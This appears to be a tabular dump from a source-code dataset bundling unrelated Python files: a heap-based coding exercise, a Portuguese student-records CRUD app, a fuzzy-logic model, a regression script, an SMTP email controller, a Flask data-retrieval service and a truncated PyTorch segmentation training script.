seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
6425932746
|
# 회사원 Demi는 가끔은 야근을 하는데요, 야근을 하면 야근 피로도가 쌓입니다.
# 야근 피로도는 야근을 시작한 시점에서 남은 일의 작업량을 제곱하여 더한 값입니다.
# Demi는 N시간 동안 야근 피로도를 최소화하도록 일할 겁니다.
# Demi가 1시간 동안 작업량 1만큼을 처리할 수 있다고 할 때, 퇴근까지 남은 N 시간과 각 일에 대한 작업량 works에 대해
# 야근 피로도를 최소화한 값을 리턴하는 함수 solution을 완성해주세요.
# 제한 사항
# works는 길이 1 이상, 20,000 이하인 배열입니다.
# works의 원소는 50000 이하인 자연수입니다.
# n은 1,000,000 이하인 자연수입니다.
# def solution(n: int, works: [int]) -> int:
# if n>sum(works): return 0
# works.sort(reverse = True)
# while n>0:
# max_idx = works.index(max(works))
# works[max_idx]-=1
# n-=1
# return sum(item**2 for item in works)
def no_overtime(n: int, works: [int]) -> int:
if n>=sum(works): return 0
from heapq import heappush, heappop
max_heap = []
for work in works:
heappush(max_heap, (-work, work))
while n>0:
tmp = heappop(max_heap)[1]
heappush(max_heap, (1-tmp, tmp-1))
n-=1
return sum(item[1]**2 for item in max_heap)
|
script-brew/2019_KCC_Summer_Study
|
programmers/Lv_3/MaengSanha/noOvertime.py
|
noOvertime.py
|
py
| 1,382 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
41409285856
|
import json
estudantes = []
professores = []
disciplinas = []
turmas = []
matriculas = []
def main():
while True:
print("Menu Principal")
print("1. Estudantes")
print("2. Disciplinas")
print("3. Professores")
print("4. Turmas")
print("5. Matrículas")
print("6. Sair")
opcao_principal = input("Escolha uma opção: ")
if opcao_principal == "1":
print("Você escolheu a opção Estudantes.")
menu_operacoes_estudantes()
elif opcao_principal == "2":
print("Você escolheu a opção Disciplinas.")
menu_operacoes_disciplinas()
elif opcao_principal == "3":
print("Você escolheu a opção Professores.")
menu_operacoes_professores()
elif opcao_principal == "4":
print("Você escolheu a opção Turmas.")
menu_operacoes_turmas()
elif opcao_principal == "5":
print("Você escolheu a opção Matrículas.")
menu_operacoes_matriculas()
elif opcao_principal == "6":
print("Saindo...")
break
else:
print("Opção inválida. Tente novamente.")
def menu_operacoes_estudantes():
while True:
print("\nMenu de Operações - Estudantes")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_estudante()
elif opcao_operacoes == "2":
listar_estudantes()
elif opcao_operacoes == "3":
atualizar_estudante()
elif opcao_operacoes == "4":
excluir_estudante()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_estudante():
codigo = int(input("\nDigite o código do estudante: "))
nome = input("\nDigite o nome do estudante: ")
cpf = input("\nDigite o CPF do estudante: ")
estudantes = recuperar_estudantes()
estudantes.append({"codigo": codigo, "nome": nome, "cpf": cpf})
salvar_estudantes(estudantes)
print(f"Estudante {nome} incluído com sucesso!")
def listar_estudantes():
estudantes = recuperar_estudantes()
if len(estudantes) == 0:
print("\nNão há estudantes cadastrados.")
else:
print("\nEstudantes cadastrados:")
for estudante in estudantes:
print(f"- Código: {estudante['codigo']}, Nome: {estudante['nome']}, CPF: {estudante['cpf']}")
def atualizar_estudante():
codigo = int(input("\nDigite o código do estudante que deseja atualizar: "))
estudantes = recuperar_estudantes()
for estudante in estudantes:
if estudante["codigo"] == codigo:
novo_codigo = int(input("\nDigite o novo código do estudante: "))
novo_nome = input("\nDigite o novo nome do estudante: ")
novo_cpf = input("\nDigite o novo CPF do estudante: ")
estudante["codigo"] = novo_codigo
estudante["nome"] = novo_nome
estudante["cpf"] = novo_cpf
salvar_estudantes(estudantes)
print(f"Estudante {codigo} atualizado com sucesso!")
return
print(f"Estudante com código {codigo} não encontrado.")
def excluir_estudante():
codigo = int(input("\nDigite o código do estudante que deseja excluir: "))
estudantes = recuperar_estudantes()
for i, estudante in enumerate(estudantes):
if estudante["codigo"] == codigo:
del estudantes[i]
salvar_estudantes(estudantes)
print(f"Estudante {codigo} excluído com sucesso!")
return
print(f"Estudante com código {codigo} não encontrado.")
def salvar_estudantes(estudantes):
with open('estudantes.json', 'w') as f:
json.dump(estudantes, f)
def recuperar_estudantes():
try:
with open('estudantes.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
def menu_operacoes_professores():
while True:
print("\nMenu de Operações - Professores")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_professor()
elif opcao_operacoes == "2":
listar_professores()
elif opcao_operacoes == "3":
atualizar_professor()
elif opcao_operacoes == "4":
excluir_professor()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_professor():
codigo = int(input("\nDigite o código do professor: "))
nome = input("\nDigite o nome do professor: ")
cpf = input("\nDigite o CPF do professor: ")
professores = recuperar_professores()
professores.append({"codigo": codigo, "nome": nome, "cpf": cpf})
salvar_professores(professores)
print(f"Professor {nome} incluído com sucesso!")
def listar_professores():
professores = recuperar_professores()
if len(professores) == 0:
print("\nNão há professores cadastrados.")
else:
print("\nProfessores cadastrados:")
for professor in professores:
print(f"- Código: {professor['codigo']}, Nome: {professor['nome']}, CPF: {professor['cpf']}")
def atualizar_professor():
codigo = int(input("\nDigite o código do professor que deseja atualizar: "))
professores = recuperar_professores()
for professor in professores:
if professor["codigo"] == codigo:
novo_codigo = int(input("\nDigite o novo código do professor: "))
novo_nome = input("\nDigite o novo nome do professor: ")
novo_cpf = input("\nDigite o novo CPF do professor: ")
professor["codigo"] = novo_codigo
professor["nome"] = novo_nome
professor["cpf"] = novo_cpf
salvar_professores(professores)
print(f"Professor {codigo} atualizado com sucesso!")
return
print(f"Professor com código {codigo} não encontrado.")
def excluir_professor():
codigo = int(input("\nDigite o código do professor que deseja excluir: "))
professores = recuperar_professores()
for i, professor in enumerate(professores):
if professor["codigo"] == codigo:
del professores[i]
salvar_professores(professores)
print(f"Professor {codigo} excluído com sucesso!")
return
print(f"Professor com código {codigo} não encontrado.")
def salvar_professores(professores):
with open('professores.json', 'w') as f:
json.dump(professores, f)
def recuperar_professores():
try:
with open('professores.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
def menu_operacoes_disciplinas():
while True:
print("\nMenu de Operações - Disciplinas")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_disciplina()
elif opcao_operacoes == "2":
listar_disciplinas()
elif opcao_operacoes == "3":
atualizar_disciplina()
elif opcao_operacoes == "4":
excluir_disciplina()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_disciplina():
codigo = int(input("\nDigite o código da disciplina: "))
nome = input("\nDigite o nome da disciplina: ")
disciplinas = recuperar_disciplinas()
disciplinas.append({"codigo": codigo, "nome": nome})
salvar_disciplinas(disciplinas)
print(f"Disciplina {nome} incluída com sucesso!")
def listar_disciplinas():
disciplinas = recuperar_disciplinas()
if len(disciplinas) == 0:
print("\nNão há disciplinas cadastradas.")
else:
print("\nDisciplinas cadastradas:")
for disciplina in disciplinas:
print(f"- Código: {disciplina['codigo']}, Nome: {disciplina['nome']}")
def atualizar_disciplina():
codigo = int(input("\nDigite o código da disciplina que deseja atualizar: "))
disciplinas = recuperar_disciplinas()
for disciplina in disciplinas:
if disciplina["codigo"] == codigo:
novo_codigo = int(input("\nDigite o novo código da disciplina: "))
novo_nome = input("\nDigite o novo nome da disciplina: ")
disciplina["codigo"] = novo_codigo
disciplina["nome"] = novo_nome
salvar_disciplinas(disciplinas)
print(f"Disciplina {codigo} atualizada com sucesso!")
return
print(f"Disciplina com código {codigo} não encontrada.")
def excluir_disciplina():
codigo = int(input("\nDigite o código da disciplina que deseja excluir: "))
disciplinas = recuperar_disciplinas()
for i, disciplina in enumerate(disciplinas):
if disciplina["codigo"] == codigo:
del disciplinas[i]
salvar_disciplinas(disciplinas)
print(f"Disciplina {codigo} excluída com sucesso!")
return
print(f"Disciplina com código {codigo} não encontrada.")
def salvar_disciplinas(disciplinas):
with open('disciplinas.json', 'w') as f:
json.dump(disciplinas, f)
def recuperar_disciplinas():
try:
with open('disciplinas.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
def menu_operacoes_turmas():
while True:
print("\nMenu de Operações - Turmas")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_turma()
elif opcao_operacoes == "2":
listar_turmas()
elif opcao_operacoes == "3":
atualizar_turma()
elif opcao_operacoes == "4":
excluir_turma()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_turma():
codigo = int(input("\nDigite o código da turma: "))
codigo_professor = int(input("\nDigite o código do professor: "))
codigo_disciplina = int(input("\nDigite o código da disciplina: "))
professores = recuperar_professores()
if not any(professor["codigo"] == codigo_professor for professor in professores):
print(f"Professor com código {codigo_professor} não encontrado.")
return
disciplinas = recuperar_disciplinas()
if not any(disciplina["codigo"] == codigo_disciplina for disciplina in disciplinas):
print(f"Disciplina com código {codigo_disciplina} não encontrada.")
return
turmas = recuperar_turmas()
turmas.append({"codigo": codigo, "codigo_professor": codigo_professor, "codigo_disciplina": codigo_disciplina})
salvar_turmas(turmas)
print(f"Turma {codigo} incluída com sucesso!")
def listar_turmas():
turmas = recuperar_turmas()
if len(turmas) == 0:
print("\nNão há turmas cadastradas.")
else:
print("\nTurmas cadastradas:")
for turma in turmas:
print(f"- Código: {turma['codigo']}, Código do Professor: {turma['codigo_professor']}, Código da Disciplina: {turma['codigo_disciplina']}")
def atualizar_turma():
codigo = int(input("\nDigite o código da turma que deseja atualizar: "))
turmas = recuperar_turmas()
for turma in turmas:
if turma["codigo"] == codigo:
novo_codigo = int(input("\nDigite o novo código da turma: "))
novo_codigo_professor = int(input("\nDigite o novo código do professor: "))
novo_codigo_disciplina = int(input("\nDigite o novo código da disciplina: "))
professores = recuperar_professores()
if not any(professor["codigo"] == novo_codigo_professor for professor in professores):
print(f"Professor com código {novo_codigo_professor} não encontrado.")
return
disciplinas = recuperar_disciplinas()
if not any(disciplina["codigo"] == novo_codigo_disciplina for disciplina in disciplinas):
print(f"Disciplina com código {novo_codigo_disciplina} não encontrada.")
return
turma["codigo"] = novo_codigo
turma["codigo_professor"] = novo_codigo_professor
turma["codigo_disciplina"] = novo_codigo_disciplina
salvar_turmas(turmas)
print(f"Turma {codigo} atualizada com sucesso!")
return
print(f"Turma com código {codigo} não encontrada.")
def excluir_turma():
codigo = int(input("\nDigite o código da turma que deseja excluir: "))
turmas = recuperar_turmas()
for i, turma in enumerate(turmas):
if turma["codigo"] == codigo:
del turmas[i]
salvar_turmas(turmas)
print(f"Turma {codigo} excluída com sucesso!")
return
print(f"Turma com código {codigo} não encontrada.")
def salvar_turmas(turmas):
with open('turmas.json', 'w') as f:
json.dump(turmas, f)
def recuperar_turmas():
try:
with open('turmas.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
def menu_operacoes_matriculas():
while True:
print("\nMenu de Operações - Matrículas")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_matricula()
elif opcao_operacoes == "2":
listar_matriculas()
elif opcao_operacoes == "3":
atualizar_matricula()
elif opcao_operacoes == "4":
excluir_matricula()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_matricula():
codigo_turma = int(input("\nDigite o código da turma: "))
codigo_estudante = int(input("\nDigite o código do estudante: "))
turmas = recuperar_turmas()
if not any(turma["codigo"] == codigo_turma for turma in turmas):
print(f"Turma com código {codigo_turma} não encontrada.")
return
estudantes = recuperar_estudantes()
if not any(estudante["codigo"] == codigo_estudante for estudante in estudantes):
print(f"Estudante com código {codigo_estudante} não encontrado.")
return
matriculas = recuperar_matriculas()
matriculas.append({"codigo_turma": codigo_turma, "codigo_estudante": codigo_estudante})
salvar_matriculas(matriculas)
print(f"Matrícula na turma {codigo_turma} incluída com sucesso!")
def listar_matriculas():
matriculas = recuperar_matriculas()
if len(matriculas) == 0:
print("\nNão há matrículas cadastradas.")
else:
print("\nMatrículas cadastradas:")
for matricula in matriculas:
print(f"- Código da Turma: {matricula['codigo_turma']}, Código do Estudante: {matricula['codigo_estudante']}")
def atualizar_matricula():
codigo_turma = int(input("\nDigite o código da turma da matrícula que deseja atualizar: "))
codigo_estudante = int(input("\nDigite o código do estudante da matrícula que deseja atualizar: "))
matriculas = recuperar_matriculas()
for matricula in matriculas:
if matricula["codigo_turma"] == codigo_turma and matricula["codigo_estudante"] == codigo_estudante:
novo_codigo_turma = int(input("\nDigite o novo código da turma: "))
novo_codigo_estudante = int(input("\nDigite o novo código do estudante: "))
turmas = recuperar_turmas()
if not any(turma["codigo"] == novo_codigo_turma for turma in turmas):
print(f"Turma com código {novo_codigo_turma} não encontrada.")
return
estudantes = recuperar_estudantes()
if not any(estudante["codigo"] == novo_codigo_estudante for estudante in estudantes):
print(f"Estudante com código {novo_codigo_estudante} não encontrado.")
return
matricula["codigo_turma"] = novo_codigo_turma
matricula["codigo_estudante"] = novo_codigo_estudante
salvar_matriculas(matriculas)
print(f"Matrícula na turma {codigo_turma} atualizada com sucesso!")
return
print(f"Matrícula na turma {codigo_turma} com estudante de código {codigo_estudante} não encontrada.")
def excluir_matricula():
codigo_turma = int(input("\nDigite o código da turma da matrícula que deseja excluir: "))
codigo_estudante = int(input("\nDigite o código do estudante da matrícula que deseja excluir: "))
matriculas = recuperar_matriculas()
for i, matricula in enumerate(matriculas):
if matricula["codigo_turma"] == codigo_turma and matricula["codigo_estudante"] == codigo_estudante:
del matriculas[i]
salvar_matriculas(matriculas)
print(f"Matrícula na turma {codigo_turma} excluída com sucesso!")
return
print(f"Matrícula na turma {codigo_turma} com estudante de código {codigo_estudante} não encontrada.")
def salvar_matriculas(matriculas):
with open('matriculas.json', 'w') as f:
json.dump(matriculas, f)
def recuperar_matriculas():
try:
with open('matriculas.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
if __name__ == "__main__":
main()
|
enzupain/Python-Projetos
|
sistema gerenciamento academico.py
|
sistema gerenciamento academico.py
|
py
| 18,786 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
31221042600
|
'''num=int(input("the number below 30 is:"))
if num>0 and num<10:
print("the number is between 0to 10")
if num>=10 and num<20: #PROMPT METHOD
print("the number is between 10to 20")
if num>=20 and num<30:
print("the number is between 20to 30")'''
a= int(input("enter a:"))
b= int(input("enter b:"))
c= int(input("enter c:"))
if a>b and a>c:
print("a is greater than all")
if b>a and b>c:
print("b is greater than all")
if c>b and c>a:
print("c is greater than all")
else:
print("a,b,c those all are equal")
|
Manikantakalla123/training-phase1
|
range.py
|
range.py
|
py
| 596 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10620073145
|
#!/usr/bin/python
import unittest
import sys
sys.path.insert(0, '../src')
from Weapon import Weapon
from Character import Character
from Clock import Clock
from Dice import Dice
class WeaponTest(unittest.TestCase):
def setUp(self):
sut_skills = []
sut_ability_set = {}
sut_cooldown_set = {}
sut_cooldown_adj_set = {}
sut_strength_set = {}
sut_stats = {}
sut_handed = []
self.sut = Weapon(
weapon_type='sword',
quality='common',
color='white',
skills=sut_skills,
handed=sut_handed,
damage='slash',
stats=sut_stats,
ability_set=sut_ability_set,
cd_timer_set=sut_cooldown_set,
cd_adj_set=sut_cooldown_adj_set,
strength_set=sut_strength_set,
weapon_id=1,
dice=Dice(attack=2, defense=2, morale=2)
)
def test_get_weapon_type(self):
self.assertEqual('sword', self.sut.weapon_type)
if __name__ == '__main__':
unittest.main()
|
jaycarson/fun
|
app/tst/WeaponTest.py
|
WeaponTest.py
|
py
| 1,076 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7160469481
|
import skfuzzy as fuzz
from skfuzzy import control as ctrl
import numpy as np
import matplotlib.pyplot as plt
def v(d, a):
return np.sqrt((d * 9.81) / np.sin(2 * np.radians(a)))
def main():
x_distance = np.arange(1, 100, 5)
x_angle = np.arange(1, 90, 1)
distance = ctrl.Antecedent(x_distance, 'distance')
angle = ctrl.Antecedent(x_angle, 'angle')
velocity = ctrl.Consequent(np.arange(0, 100, 1), 'velocity')
distance.automf(3)
angle.automf(5)
velocity.automf(5)
# poor
# mediocre
# average
# decent
# good
rules = [
ctrl.Rule(distance['poor'], velocity['poor']),
ctrl.Rule(distance['average'] & (angle['mediocre'] | angle['average'] | angle['decent']), velocity['mediocre']),
ctrl.Rule(distance['average'] & (angle['poor'] | angle['good']), velocity['average']),
ctrl.Rule(distance['good'] & (angle['mediocre'] | angle['average'] | angle['decent']), velocity['mediocre']),
ctrl.Rule(distance['good'] & (angle['poor'] | angle['good']), velocity['good']),
]
velocity_ctrl = ctrl.ControlSystemSimulation(ctrl.ControlSystem(rules=rules))
mse = 0
i = 0
preds = []
for ang in x_angle:
for dst in x_distance:
i += 1
true = v(dst, ang)
velocity_ctrl.input['distance'] = dst
velocity_ctrl.input['angle'] = ang
velocity_ctrl.compute()
preds.append(velocity_ctrl.output['velocity'])
mse += (true - velocity_ctrl.output['velocity']) ** 2
mse /= i
print(f'MSE: {mse}')
X, Y = np.meshgrid(x_distance, x_angle)
Z = v(X, Y)
fig = plt.figure()
ax = fig.add_subplot(1, 2, 1, projection='3d')
ax.plot_surface(X, Y, Z, rstride=1, cstride=1,
cmap='viridis', edgecolor='none')
ax.set_title('Prawdziwa funkcja mocu rzutu')
ax.set_xlabel('dystans')
ax.set_ylabel('kat')
ax.set_zlabel('moc rzutu')
Z = np.array(preds).reshape(Z.shape)
ax = fig.add_subplot(1, 2, 2, projection='3d')
ax.plot_surface(X, Y, Z, rstride=1, cstride=1,
cmap='viridis', edgecolor='none')
ax.set_title('Predykcja funkcji mocu rzutu')
ax.set_xlabel('dystans')
ax.set_ylabel('kat')
ax.set_zlabel('moc rzutu')
plt.show()
if __name__ == '__main__':
main()
|
DonChaka/PSI
|
Fuzzy/fuzzy_easy.py
|
fuzzy_easy.py
|
py
| 2,354 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72033875709
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset = pd.read_csv('forestfires.csv')
pd.plotting.scatter_matrix(dataset)
X = dataset.iloc[:,0:12].values
y = dataset.iloc[:,-1].values
dataset.isnull().sum()
dataset.info()
temp = pd.DataFrame(X[:,[2,3]])
temp_month = pd.get_dummies(temp[0])
temp_day = pd.get_dummies(temp[1])
del(temp)
X = np.append(X,temp_month,axis = 1)
X = np.append(X,temp_day,axis = 1)
X = np.delete(X,2,axis =1)
X = np.delete(X,2,axis =1)
del(temp_month,temp_day)
temp = pd.DataFrame(X[:,:])
from sklearn.preprocessing import StandardScaler
st = StandardScaler()
X = st.fit_transform(X)
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test = train_test_split(X,y)
from sklearn.linear_model import LinearRegression
lr = LinearRegression()
lr.fit(X_train,y_train)
lr.score(X_test,y_test)
from sklearn.ensemble import RandomForestRegressor
ran = RandomForestRegressor(n_estimators = 5)
ran.fit(X_train,y_train)
ran.score(X_train,y_train)
#this is complete
|
Manavendrasingh/ML-code
|
forestfire.py
|
forestfire.py
|
py
| 1,103 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5345020806
|
import email.utils
import json
import os
import smtplib
import ssl
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from pathlib import Path
import jinja2
from dotenv import load_dotenv
send_user = ""
load_dotenv()
class SendEmailController:
def __init__(self):
pass
@staticmethod
def render_mail_template(template_params, template_name):
html_template_url = Path(__file__).parents[1] / "mail_templates"
html_template_loader = jinja2.FileSystemLoader(html_template_url)
html_template = jinja2.Environment(loader=html_template_loader)
email_template = html_template.get_template(template_name)
compose_email_html = email_template.render(template_params)
return compose_email_html
@staticmethod
def config_send_mail(subject, receive_email, compose_email_html):
sender_email = os.getenv("SENDER_EMAIL")
sender_name = os.getenv("SENDER_NAME")
smtp_server = os.getenv("SMTP_SERVER")
smtp_port = os.getenv("SMTP_PORT")
password = os.getenv("MAIL_PASSWORD")
list_email_cc = []
msg = MIMEMultipart("mixed")
msg["Subject"] = subject
msg["From"] = email.utils.formataddr((sender_name, sender_email))
if receive_email.upper() == "Undetermined".upper():
msg["To"] = sender_email
else:
msg["To"] = receive_email
msg["Cc"] = ", ".join(list_email_cc)
msg.attach(MIMEText(compose_email_html, "html"))
context = ssl.create_default_context()
with smtplib.SMTP(smtp_server, int(smtp_port)) as smtp:
smtp.starttls(context=context)
smtp.login(sender_email, password)
smtp.send_message(msg)
smtp.quit()
@staticmethod
def send_email(receive_email, subject, template_params, template_file_name):
# subject, template_mail = SendEmailController.build_template(template_params)
# subject = "send email test"
# template_mail = {"text": "aloha"}
template_mail = template_params
compose_email_html = SendEmailController.render_mail_template(
template_mail, template_file_name
)
if subject and template_mail:
SendEmailController.config_send_mail(
subject, receive_email, compose_email_html
)
@staticmethod
def build_template(template_params):
data = json.dumps(template_params)
data = json.loads(data)
id = data.get("id")
time = data.get("time")
# email_to = data.get("email_to")
source_ip = data.get("source_ip", "")
destination = data.get("destination")
flow_count = data.get("flow_count", -1)
tenant = data.get("tenant")
vpc = data.get("vpc")
body_data = ""
subject = "[Violation]"
if id == 1:
category = "Policy violation"
subject = subject + " " + category
body_data = {
"category": category,
"time": time,
"source_ip": source_ip,
"destination": destination,
"tenant": tenant,
"vpc": vpc,
}
elif id == 2:
category = "DDoS Attack"
subject = subject + " " + category
body_data = {
"category": category,
"time": time,
"destination": destination,
"flow_count": flow_count,
"tenant": tenant,
"vpc": vpc,
}
elif id == 3:
category = "Possible Attack"
subject = subject + " " + category
body_data = {
"category": category,
"time": time,
"destination": destination,
"tenant": tenant,
"vpc": vpc,
}
return subject, body_data
|
nguyendoantung/e-maintenance-system
|
back-end/service/utils/email/EmailController.py
|
EmailController.py
|
py
| 3,978 |
python
|
en
|
code
| 0 |
github-code
|
6
|
1633248512
|
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
BASEURL = 'augment'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
KEYWORD = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
keywords/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<base_rate>
/augment/root/STREAM/distributed/1of2/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = 'STREAM'
DATAROOT = config.dataroot
scope_blueprint = Blueprint('augment_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>' +
'/start/<int:start>/limit/<int:limit>')
def get_scope(rootdir, index=0, total=1, params=None, start=0, limit=sys.maxsize):
global KEYWORD
if rootdir == "0":
rootdir = INDEXDIR
rootdir = _get_obj_absolute_path(rootdir)
seed = None
percentage = 0.
seed, percentage = decode_params(params)
# Assuming the same positive list is present in all the servers
# Always create a new index file
base_list, KEYWORD = create_index(rootdir, percentage, seed, index, total)
total_entries = len(base_list)
start = start if start > 0 else 0
end = min(total_entries, start + limit) if limit > 0 else total_entries
base_list = base_list[start:end]
total_entries = end - start
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
for path in base_list:
path = path.strip()
yield _get_object_element(object_path=path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
"""
Decodes the params which are '_' seperated
<[d]eterminant/[r]andom>_<random_seed>_<baserate>
"""
keywords = params.split('_')
mix_type = keywords[0]
seed = None
if len(keywords) > 1:
seed = int(keywords[1])
if mix_type == 'r' or seed is None:
seed = random.randrange(10000)
percentage = 0.1 # default base_rate = 0.1%
if len(keywords) > 2:
percentage = float(keywords[2])
return seed, round(percentage, 4)
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
meta = {'_gt_label': KEYWORD}
if KEYWORD in path:
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', present=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
@scope_blueprint.route('/meta/<path:present>')
def get_object_meta(present=False):
attrs = dict()
if present:
attrs['_gt_label'] = KEYWORD
return jsonify(attrs)
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
def create_index(base_dir, base_rate=0.05, seed=42, rank=0, total_servers=1):
"""
Creates Index List File:
Assuming name of files NEGATIVE (e.g:subset YFCC), POSITIVE
"""
filepath_split = ['STREAM', "{:.2f}".format(base_rate), str(rank), str(total_servers), str(seed)]
filepath = '_'.join(filepath_split)
filepath = os.path.join(base_dir, filepath)
positive_path = os.path.join(base_dir, 'POSITIVE')
negative_path = os.path.join(base_dir, 'NEGATIVE')
positive_firstline = open(positive_path).readline().rstrip()
keyword = positive_firstline.split('/')[-2] # Assuming all positives are in the same parent dir
_log.info("Dir {} BR: {} Seed:{} FP{}".format(base_dir, base_rate, seed, filepath))
sys.stdout.flush()
if not os.path.exists(filepath):
positive_data = read_file_list(positive_path) # same across servers
negative_data = read_file_list(negative_path) # different across servers
random.Random(seed).shuffle(positive_data)
random.Random(seed).shuffle(negative_data)
len_positive = len(positive_data)
start_idx = int(rank * (1.0 / total_servers) * len_positive)
end_idx = int((rank+1) * (1.0 / total_servers) * len_positive)
positive_data = positive_data[start_idx:end_idx]
len_positive = len(positive_data)
negative_sample = int(len_positive * (100./base_rate -1))
negative_data = negative_data[:negative_sample]
return write_data(filepath, [negative_data, positive_data], seed), keyword
return read_file_list(filepath), keyword
|
cmusatyalab/opendiamond
|
opendiamond/dataretriever/augment_store.py
|
augment_store.py
|
py
| 6,831 |
python
|
en
|
code
| 19 |
github-code
|
6
|
655282827
|
import argparse
import os
import torch
import torch_em
from torch_em.model import AnisotropicUNet
ROOT = '/scratch/pape/mito_em/data'
def get_loader(datasets, patch_shape,
batch_size=1, n_samples=None,
roi=None):
paths = [
os.path.join(ROOT, f'{ds}.n5') for ds in datasets
]
raw_key = 'raw'
label_key = 'labels'
sampler = torch_em.data.MinForegroundSampler(min_fraction=0.05, p_reject=.75)
label_transform = torch_em.transform.label.connected_components
return torch_em.default_segmentation_loader(
paths, raw_key,
paths, label_key,
batch_size=batch_size,
patch_shape=patch_shape,
label_transform=label_transform,
sampler=sampler,
n_samples=n_samples,
num_workers=8*batch_size,
shuffle=True,
label_dtype=torch.int64
)
def get_model(large_model):
n_out = 12
if large_model:
print("Using large model")
model = AnisotropicUNet(
scale_factors=[
[1, 2, 2],
[1, 2, 2],
[2, 2, 2],
[2, 2, 2],
[2, 2, 2]
],
in_channels=1,
out_channels=n_out,
initial_features=128,
gain=2,
final_activation=None
)
else:
print("Using vanilla model")
model = AnisotropicUNet(
scale_factors=[
[1, 2, 2],
[1, 2, 2],
[2, 2, 2],
[2, 2, 2]
],
in_channels=1,
out_channels=n_out,
initial_features=64,
gain=2,
final_activation=None
)
return model
def train_embeddings(args, datasets):
large_model = bool(args.large_model)
model = get_model(large_model)
# patch shapes:
if large_model:
# largest possible shape for A100 with mixed training and large model
# patch_shape = [32, 320, 320]
patch_shape = [32, 256, 256]
else:
# largest possible shape for 2080Ti with mixed training
